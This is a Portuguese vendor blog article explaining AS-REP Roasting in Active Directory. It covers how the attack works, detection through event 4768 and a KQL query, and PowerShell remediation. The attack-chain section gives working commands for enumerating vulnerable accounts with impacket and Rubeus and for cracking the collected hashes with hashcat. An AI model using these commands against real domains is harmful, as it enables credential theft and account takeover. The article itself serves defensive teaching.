🏢Active DirectoryKerberosAttack PathsAccountsConfig

AS-REP Roasting: Coletando Hashes Sem Credenciais

O AS-REP Roasting visa contas com pre-autenticacao Kerberos desabilitada, permitindo coletar hashes crackaveis sem credenciais. Aprenda como detecta-lo e corrigi-lo.

ES
EtcSec Security Team
4 min read
AS-REP Roasting: Coletando Hashes Sem Credenciais

O que e AS-REP Roasting?

O AS-REP Roasting e um ataque do Active Directory que visa contas com a pre-autenticacao Kerberos desabilitada. Qualquer atacante, mesmo sem credenciais, pode solicitar uma resposta AS-REP para essas contas e receber um blob cifrado com o hash de sua senha, pronto para ser crackeado offline.

Ao contrario do Kerberoasting, o AS-REP Roasting nao requer nenhuma credencial se o atacante tiver acesso de rede ao dominio. E um dos ataques de menor friccao no Active Directory.

A vulnerabilidade vem de uma opcao do Kerberos chamada DONT_REQUIRE_PREAUTH. Quando habilitada, o KDC ignora a etapa de pre-autenticacao e emite diretamente uma AS-REP com dados cifrados com o hash da conta.

⚠️ Diferenca principal do Kerberoasting: O Kerberoasting requer uma conta de dominio valida. O AS-REP Roasting pode ser realizado sem nenhuma credencial, de fora do dominio.

Como Funciona

No Kerberos padrao, antes de emitir um TGT, o cliente deve provar que conhece a senha enviando um timestamp cifrado. Isso impede a coleta de hashes offline.

Quando DONT_REQUIRE_PREAUTH esta definido, essa etapa e ignorada. O KDC responde a qualquer AS-REQ para essa conta com uma AS-REP contendo uma chave de sessao cifrada com o hash NTLM da conta, sem nenhuma prova de identidade.

A Cadeia de Ataque

Etapa 1 - Enumerar Contas Vulneraveis

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth, PasswordLastSet |
    Select-Object SamAccountName, PasswordLastSet

# Sem credenciais
impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.0.1

# Com conta de dominio
impacket-GetNPUsers corp.local/user:password -request -dc-ip 10.10.0.1

Etapa 2 - Coletar Hashes AS-REP

.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt

Etapa 3 - Crackear Offline

# Modo 18200 para hashes AS-REP
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt --rules-file best64.rule

Etapa 4 - Tomada de Controle da Conta

Um hash AS-REP crackeado fornece a senha em texto claro da conta. O atacante pode autenticar-se como esse usuario e usar a conta como pivo para outros ataques.

Deteccao

Event IDs do Windows

Event IDFonteO que observar
4768DC - SecurityAS-REQ com Pre-Authentication Type: 0 — pre-autenticacao nao fornecida
4768DC - SecurityMultiplas AS-REQ para diferentes contas da mesma IP

💡 Dica: Um unico evento 4768 com tipo de pre-auth 0 para uma conta que normalmente o exige e um alerta de alta confianca.

Consulta SIEM (Elastic KQL)

event.code: "4768" AND
winlog.event_data.PreAuthType: "0" AND
winlog.event_data.Status: "0x0"

Remediacao

💡 Acao Rapida: Reative a pre-autenticacao em todas as contas que a tem desabilitada. E uma correcao de uma linha por conta, sem impacto para o usuario na maioria dos casos.

Reativar a Pre-Autenticacao

# Conta individual
Set-ADAccountControl -Identity vulnerable_user -DoesNotRequirePreAuth $false

# Correcao em massa
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | ForEach-Object {
    Set-ADAccountControl -Identity $_ -DoesNotRequirePreAuth $false
    Write-Host "Corrigido: $($_.SamAccountName)"
}

Auditar e Reforcar

  1. Identificar todas as contas vulneraveis:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties PasswordLastSet, Description |
    Select-Object SamAccountName, PasswordLastSet, Description |
    Export-Csv contas_vulneraveis_asrep.csv -NoTypeInformation
  1. Rotacionar senhas das contas afetadas — mesmo apos reativar a pre-autenticacao.
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Set-ADUser -ChangePasswordAtLogon $true
  1. Restringir acesso LDAP anonimo para evitar enumeracao nao autenticada do flag.

Como o EtcSec Detecta Isso

O EtcSec sinaliza contas com pre-autenticacao Kerberos desabilitada em cada auditoria AD.

A deteccao ASREP_ROASTING_RISK identifica todas as contas com DONT_REQUIRE_PREAUTH definido, independentemente de ja terem sido atacadas.

Verificacoes relacionadas:

  • PASSWORD_NEVER_EXPIRES - contas com pre-autenticacao desabilitada e senhas que nunca expiram sao uma superficie de ataque permanente
  • PASSWORD_POLICY_WEAK - politica fraca torna o cracking mais rapido e provavel
  • WEAK_KERBEROS_POLICY - configuracoes permissivas ampliam a janela de exploracao

ℹ️ Nota: O EtcSec verifica automaticamente essas vulnerabilidades em cada auditoria AD. Execute uma auditoria gratuita para identificar as contas expostas ao AS-REP Roasting.

🏢 Active DirectoryKerberosAttack PathsAccountsConfig
EtcSec

© 2026 EtcSec. All rights reserved.

AS-REP Roasting — Deteccao & Remediacao | EtcSec — EtcSec Blog | EtcSec